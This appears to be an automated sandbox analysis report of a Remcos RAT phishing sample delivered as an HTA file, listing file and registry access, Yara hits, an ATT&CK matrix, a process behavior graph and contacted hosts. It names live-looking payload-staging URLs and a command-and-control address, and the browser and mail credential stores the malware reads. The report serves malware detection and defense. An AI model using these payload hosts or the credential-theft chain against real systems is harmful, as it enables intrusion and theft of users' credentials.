                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00404915 GetLocalTime,CreateEventA,CreateThread,12_2_00404915
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041A9AD GetComputerNameExW,GetUserNameW,12_2_0041A9AD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00448267 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,12_2_00448267
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0041739B GetVersionExW,13_2_0041739B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.4102227044.0000000001355000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4104782435.0000000002EAF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4102227044.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1915796517.0000000005DFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7652, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8052, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data12_2_0040B21B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\12_2_0040B335
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \key3.db12_2_0040B335
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: ESMTPPassword14_2_004033F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword14_2_00402DB3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword14_2_00402DB3
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8132, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-ET2B3IJump to behavior
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.4102227044.0000000001355000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4104782435.0000000002EAF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4102227044.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1915796517.0000000005DFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7652, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8052, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: cmd.exe12_2_00405042
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information111
                        Scripting
                        Valid Accounts21
                        Native API
                        111
                        Scripting
                        1
                        DLL Side-Loading
                        1
                        Deobfuscate/Decode Files or Information
                        2
                        OS Credential Dumping
                        2
                        System Time Discovery
                        Remote Services11
                        Archive Collected Data
                        12
                        Ingress Tool Transfer
                        Exfiltration Over Other Network Medium1
                        System Shutdown/Reboot
                        CredentialsDomainsDefault Accounts1
                        Exploitation for Client Execution
                        1
                        DLL Side-Loading
                        1
                        Bypass User Account Control
                        2
                        Obfuscated Files or Information
                        211
                        Input Capture
                        1
                        Account Discovery
                        Remote Desktop Protocol1
                        Data from Local System
                        2
                        Encrypted Channel
                        Exfiltration Over Bluetooth1
                        Defacement
                        Email AddressesDNS ServerDomain Accounts132
                        Command and Scripting Interpreter
                        1
                        Windows Service
                        1
                        Access Token Manipulation
                        1
                        DLL Side-Loading
                        2
                        Credentials in Registry
                        1
                        System Service Discovery
                        SMB/Windows Admin Shares11
                        Email Collection
                        1
                        Remote Access Software
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts2
                        Service Execution
                        Login Hook1
                        Windows Service
                        1
                        Bypass User Account Control
                        3
                        Credentials In Files
                        3
                        File and Directory Discovery
                        Distributed Component Object Model211
                        Input Capture
                        2
                        Non-Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts3
                        PowerShell
                        Network Logon Script422
                        Process Injection
                        1
                        Masquerading
                        LSA Secrets39
                        System Information Discovery
                        SSH3
                        Clipboard Data
                        112
                        Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                        Virtualization/Sandbox Evasion
                        Cached Domain Credentials31
                        Security Software Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Access Token Manipulation
                        DCSync21
                        Virtualization/Sandbox Evasion
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job422
                        Process Injection
                        Proc Filesystem4
                        Process Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                        Application Window Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                        System Owner/User Discovery
                        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1590499 Sample: verynicegirlwalkingarounfth... Startdate: 14/01/2025 Architecture: WINDOWS Score: 100 58 res.cloudinary.com 2->58 60 geoplugin.net 2->60 68 Suricata IDS alerts for network traffic 2->68 70 Found malware configuration 2->70 72 Malicious sample detected (through community Yara rule) 2->72 74 16 other signatures 2->74 12 mshta.exe 1 2->12         started        signatures3 process4 signatures5 100 Suspicious command line found 12->100 102 PowerShell case anomaly found 12->102 15 cmd.exe 1 12->15         started        process6 signatures7 104 Detected Cobalt Strike Beacon 15->104 106 Suspicious powershell command line found 15->106 108 Wscript starts Powershell (via cmd or directly) 15->108 110 PowerShell case anomaly found 15->110 18 powershell.exe 42 15->18         started        23 conhost.exe 15->23         started        process8 dnsIp9 62 172.245.123.7, 49730, 49738, 80 AS-COLOCROSSINGUS United States 18->62 50 seethebestthingsfo...withgoodnewsthi.vbS, Unicode 18->50 dropped 52 C:\Users\user\AppData\...\2qf3pwzp.cmdline, Unicode 18->52 dropped 76 Loading BitLocker PowerShell Module 18->76 25 wscript.exe 2 18->25         started        28 csc.exe 3 18->28         started        file10 signatures11 process12 file13 86 Detected Cobalt Strike Beacon 25->86 88 Suspicious powershell command line found 25->88 90 Wscript starts Powershell (via cmd or directly) 25->90 92 2 other signatures 25->92 31 powershell.exe 15 16 25->31         started        56 C:\Users\user\AppData\Local\...\2qf3pwzp.dll, PE32 28->56 dropped 34 cvtres.exe 1 28->34         started        signatures14 process15 signatures16 112 Writes to foreign memory regions 31->112 114 Injects a PE file into a foreign processes 31->114 36 CasPol.exe 4 15 31->36         started        41 conhost.exe 31->41         started        process17 dnsIp18 64 172.245.123.12, 49739, 49741, 8690 AS-COLOCROSSINGUS United States 36->64 66 geoplugin.net 178.237.33.50, 49740, 80 ATOM86-ASATOM86NL Netherlands 36->66 54 C:\ProgramData\remcos\logs.dat, data 36->54 dropped 78 Contains functionality to bypass UAC (CMSTPLUA) 36->78 80 Detected Remcos RAT 36->80 82 Tries to steal Mail credentials (via file registry) 36->82 84 8 other signatures 36->84 43 CasPol.exe 36->43         started        46 CasPol.exe 36->46         started        48 CasPol.exe 36->48         started        file19 signatures20 process21 signatures22 94 Tries to steal Instant Messenger accounts or passwords 43->94 96 Tries to steal Mail credentials (via file / registry access) 43->96 98 Tries to harvest and steal browser information (history, passwords, etc) 46->98

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        verynicegirlwalkingarounftheworldmuuuah.hta13%VirustotalBrowse
                        verynicegirlwalkingarounftheworldmuuuah.hta11%ReversingLabsWin32.Phishing.Generic
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        http://172.245.123.7/0%Avira URL Cloudsafe
                        http://172.245.123.7/77/kissingbestthingswithgreatdayscomingforhim.txt0%Avira URL Cloudsafe
                        http://172.245.123.7/77/seethebestthingsforgetmebackwithgoodnewsthings.tIF0%Avira URL Cloudsafe
                        http://172.245.123.7/77/seethebestthingsforgetmebackwithgoodnewsthings.tIFMSIL0%Avira URL Cloudsafe
                        http://172.245.123.7/77/seethebe0%Avira URL Cloudsafe
                        http://crl.microsoftX0%Avira URL Cloudsafe
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        geoplugin.net
                        178.237.33.50
                        truefalse
                          high
                          res.cloudinary.com
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            http://172.245.123.7/77/seethebestthingsforgetmebackwithgoodnewsthings.tIFtrue
                            • Avira URL Cloud: safe
                            unknown
                            http://172.245.123.7/77/kissingbestthingswithgreatdayscomingforhim.txttrue
                            • Avira URL Cloud: safe
                            unknown
                            http://geoplugin.net/json.gpfalse
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://172.245.123.7/powershell.exe, 00000003.00000002.1777884183.0000000006DC8000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1776250099.000000000575C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1915796517.0000000005DFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1774693140.0000000004849000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.imvu.comrCasPol.exe, 0000000F.00000002.1941427909.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                    high
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.1915796517.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1774693140.0000000004849000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.1915796517.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://go.micropowershell.exe, 00000003.00000002.1774693140.0000000004C3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://contoso.com/Licensepowershell.exe, 00000007.00000002.1915796517.0000000005DFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.imvu.comCasPol.exe, CasPol.exe, 0000000F.00000002.1941427909.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/Iconpowershell.exe, 00000007.00000002.1915796517.0000000005DFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.nirsoft.netCasPol.exe, 0000000D.00000002.1947882801.0000000000EEF000.00000004.00000010.00020000.00000000.sdmpfalse
                                                    high
                                                    http://go.microspowershell.exe, 00000003.00000002.1774693140.0000000004C3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://aka..winsvrpowershell.exe, 00000003.00000002.1779425802.0000000007CA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.1915796517.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comCasPol.exe, 0000000F.00000002.1941427909.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                            high
                                                            https://github.com/koswald/VBScript/blob/master/SetupPerUser.mdwscript.exe, 00000006.00000003.1746388479.000000000359F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1746292531.0000000005DBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1743748837.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1749746793.0000000005AF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1746708576.00000000059F1000.00000004.00000020.00020000.00000000.sdmp, seethebestthingsforgetmebackwithgoodnewsthings[1].tiff.3.dr, seethebestthingsforgetmebackwithgoodnewsthi.vbS.3.drfalse
                                                              high
                                                              https://www.google.comCasPol.exe, CasPol.exe, 0000000F.00000002.1941427909.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                high
                                                                https://res.cloudinary.compowershell.exe, 00000007.00000002.1915796517.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpgtpowershell.exe, 00000007.00000002.1915796517.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://172.245.123.7/77/seethebepowershell.exe, 00000003.00000002.1774693140.0000000004B11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://geoplugin.net/json.gp/Cpowershell.exe, 00000007.00000002.1915796517.0000000005DFC000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.1774693140.00000000046F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1915796517.0000000004D91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbswscript.exe, 00000006.00000003.1746292531.0000000005DBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1743748837.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1749746793.0000000005AF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1746708576.00000000059F1000.00000004.00000020.00020000.00000000.sdmp, seethebestthingsforgetmebackwithgoodnewsthings[1].tiff.3.dr, seethebestthingsforgetmebackwithgoodnewsthi.vbS.3.drfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1774693140.0000000004849000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://contoso.com/powershell.exe, 00000007.00000002.1915796517.0000000005DFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
